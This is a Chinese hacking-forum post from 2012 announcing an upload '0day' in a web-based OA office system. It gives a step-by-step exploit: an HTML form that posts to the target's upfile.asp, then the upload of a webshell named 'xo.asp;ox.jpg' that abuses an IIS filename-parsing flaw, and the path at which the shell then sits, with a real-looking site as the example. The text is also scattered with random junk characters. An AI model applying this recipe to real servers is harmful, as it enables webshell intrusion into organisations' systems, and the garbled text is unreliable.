找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2218|回复: 0
打印 上一主题 下一主题

全能OA办公系统0day OA办公系统漏洞 上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-21 13:45:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
全能OA办公系统 上传漏洞/ o3 r7 c  e, {0 N+ S5 W6 f7 k: L( A

- p3 a. p4 }4 m# B系统介绍:+ `' U7 y, n: y+ j4 `

' H. l, \* T7 y. j8 g全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。' H' A. a8 q& Q9 l3 Y9 d1 V% l

6 E  j% Y" p& @; Y" m主要功能:
/ X2 i  z- @1 F) c& @9 P* b公司通告
. ]- t) u4 E) H) a+ \工作计划
% Q* ^+ Y. q' k! i) j- N通讯助理 + C# S6 |% e- u
客户资源 ; U& o; t( l/ w7 U7 `- m
我的公文
  F) y6 O( F+ N3 L% @3 ]6 q( `公文传阅
" L- o: t5 n; l0 T/ L  U+ l' i公共资源   ?; L/ F% k0 l* @! H& {
资源预约 " Z; H( N4 u1 |$ B- ?; e7 u
今日考勤
, Z+ q6 Z1 i7 M  p* C) ^7 x个人计划 + o+ X- l. {* m7 X2 l
个人通讯录
/ x! A( i: r0 m. T- H2 g个人基本档案 + R* T' `3 g0 z/ O/ @
未读邮件
4 E& k3 M6 K4 c  h- V% P5 C9 K发邮件
$ c# x2 s3 s( N# P( `收件夹
6 }  ^8 Q/ E& k0 ^# g! n. w寄件夹
  k9 |4 V6 S( E: w网络硬盘 ; r4 s1 X4 V* y* B8 u7 V
网络会议 9 }: k5 d6 s: P* Z' ~! o
网络调查
. s3 |, k0 ]2 G8 j& }- Y交流论坛% k$ j7 b4 \" W6 Z
; b5 x, z4 w& G$ I, c/ O
有兴趣测试的朋友可以下源码看看
: m- Z. v+ a3 S6 w) U. m$ U5 |: X( R$ K: s+ }# y
源码下载:! |6 B5 U4 M& V# R
- P% O; E. K  D  Y# J! O" U
http://www.mycodes.net/30/4750.htm5 ?: e) d1 p0 r/ J9 ~
. o8 ~/ i% F+ j; e( u& F# H
漏洞介绍:
1 l8 f1 e* p& z4 D3 d) i
4 V- W3 r; p1 g8 b由upfile.asp上传文件漏洞引起5 K8 o$ @, _$ P

4 s" Z+ ?( v" H# S' n& T3 e测试方法:# o/ ]. S9 H& d6 r
5 e, E5 E0 w( P
使用名小子上传http://www.itlynn.com/upfile.asp即可# N6 t. Z2 r" j) z! t6 T
- h- f+ m. v2 J/ K' A
如果upfile.asp文件被删除不存在。
0 m; [" x6 v6 Z% F+ {+ Y
4 V8 C- G6 ?8 ?  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp$ o% p. S# @+ E- `0 N" d

8 J8 G5 y5 B; ~如果存在那么将如下代码保存为upfile.html。
7 q0 ?) a: G+ ?1 D4 f: h; E5 M. V% ?% S2 R. K! s8 ^
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp. H2 v  y% [0 |. N( ~

- f6 L1 |! {7 @  A. N6 v ( D( J+ x4 B2 ?$ Y
( q9 O' ]6 ]" R9 I5 p( ?; K
01 <table border='0' align="center" cellpadding="5"> : }3 j7 D$ K2 A8 W6 J: w- W: o) q1 O* O
7 z8 w: w/ K9 E1 c9 C2 W
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
% |$ D$ I& s$ b
+ R! I' J& i8 e4 M& c9 g03 <tr>
3 a/ B5 H; D$ ]& t! m  i. x
6 ?) `2 u! K' l% c# t5 d04             <td>报错:</td> * e: A4 t5 M% W' p6 o

; Z$ D/ V8 c6 ~+ }8 f( D3 P9 f; }; x05             <td><input type='radio' name='errnumber' value='0'> 3 c# x) D+ L3 u( d

. L+ T. W! j& W6 v+ B5 J06               自动更名
. k* n0 Q# ^( D
  G$ [" t: Y1 p6 E0 Q0 v8 C07               <input type='radio' name='errnumber' value='1' checked>
7 h, A+ e8 E6 f! j/ Q' J. ~2 j& w/ o, {2 G) t7 f1 J
08               报错方式
2 E: \6 d- O" k' O
: k' G' N2 U# @$ h09               <input type='radio' name='errnumber' value='2'>
: q  \. U8 n7 ~4 Q: a- ^3 _
, Q# _$ Z* `) q: Z10               直接覆盖</td> $ o! T9 C8 S8 l+ j6 K2 z

2 E3 D, P/ _- u: f2 u# G11           </tr>
, u  y9 J9 m, M6 y& |: N2 t) T* ~. _* C! ?! G; A; @6 y3 E
12           <tr> - S) j7 E9 m# I0 u& j
0 S" g1 T' w4 h, j* m4 t
13             <td>主题:</td>
& X* X  c: e' t% B# u& I1 q& s: R5 t. ^: d5 U
14             <td><input type='text' name='filename' size='30'></td> - g6 G2 D: @7 M" B5 f9 x: ?* `' ]
/ Z+ t- b$ i' ~
15           </tr>
; J6 m% J" T6 r. p, ^
4 N$ l; Y9 {3 w' v+ v" X16           <tr>
4 D$ C/ t0 i2 d( R9 p8 K* m! e6 L' ^
17             <td>文件:</td> : R6 h, L6 t$ y' f  f

* c% _0 s) B% ~18             <td><input type="file"name="fruit"size="30"></td> ; U- A0 r: I6 O! y' \9 H" \

! D9 p( R1 S( ?. C* r19           </tr> # ]- M) U- G% E. r6 X2 V1 t4 @! [/ P

6 c2 K+ a& e1 h5 G6 l20           <tr> ( \/ }7 s5 p& M2 x
0 Y  V5 R- M+ m+ `* x3 C
21             <td valign='top'>简介:</td>
. z9 h: x- d; a
& }; b  M) K' ?) R8 R22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
- C0 w* w! E* A, Z6 p$ q
/ ]1 N+ Y: V$ U2 n3 G" l0 ^! l0 Q23           </tr>
% f& Q" `2 w$ @4 s3 L" D1 t3 N0 A8 n  R3 y; r+ y7 f
24   , ^1 h3 e2 h' R7 q
2 L# ?, ~" M! _$ l; e' K
25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> ! ?" a5 h1 r  S* ?' \

0 W3 O9 a: v3 c) T- i5 p  Z8 q. M26           </tr> 9 l( j3 y, ~4 K$ s6 H6 K
7 M8 Z- g; ]6 P: |/ m  V! j
27         </form>
0 |- A) {9 V: }' M8 ?8 `
3 d6 l6 k. t5 f然后打开上传一个文件名为xo.asp;ox.jpg的文件。& b0 D, f8 B! `7 m" i& Y

$ @; ^$ l, _2 k8 e* O. `
- A4 x! G+ L' f9 g" m" E4 S: `# w3 f( E2 _8 @- c$ o
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
$ }0 y: m) p" d
5 Q7 h& f% W3 c8 d- X此漏洞需要配合解析漏洞利用。
+ T+ Z! p& b# r, U# N( X; c' ~/ I1 `  ?& @, j' E
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表